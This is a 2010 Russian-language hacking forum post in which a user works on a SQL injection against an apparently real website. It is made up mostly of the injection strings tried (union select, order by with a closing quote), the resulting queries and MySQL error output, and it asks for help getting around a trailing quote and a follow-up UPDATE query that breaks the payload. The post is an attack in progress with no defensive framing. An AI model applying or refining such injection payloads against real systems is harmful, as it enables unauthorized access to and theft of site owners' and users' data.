04.08.2010, 21:12
|
|
Новичок
Регистрация: 01.07.2009
Сообщений: 9
С нами:
8874545
Репутация:
1
|
|
есть скуля вида
Сообщение от None
SELECT * FROM table WHERE id='123[inj]'
последняя кавычка учитывается в запросе в любом случае и вариант
[inj] = ' union select 1,2,3--
не прокатывает. не только --, но и /* /**/ ; никакие комментарии не работают. в итоге если
[inj] = 'order by 1--
выводит
Сообщение от None
SELECT * FROM table WHERE id='123' order by 1--'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
я подобрал количество столбцов запросом, где
[inj] = '+union+select+1,2,3,'
получилось
Сообщение от None
SELECT * FROM table WHERE id='123' union select 1,2,3,''
но в скрипте идет следующий запрос, который выдает ошибку
Сообщение от None
UPDATE table SET views=views+1 WHERE id='123' union select 1,2,3,''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,''' at line 1
|
|
|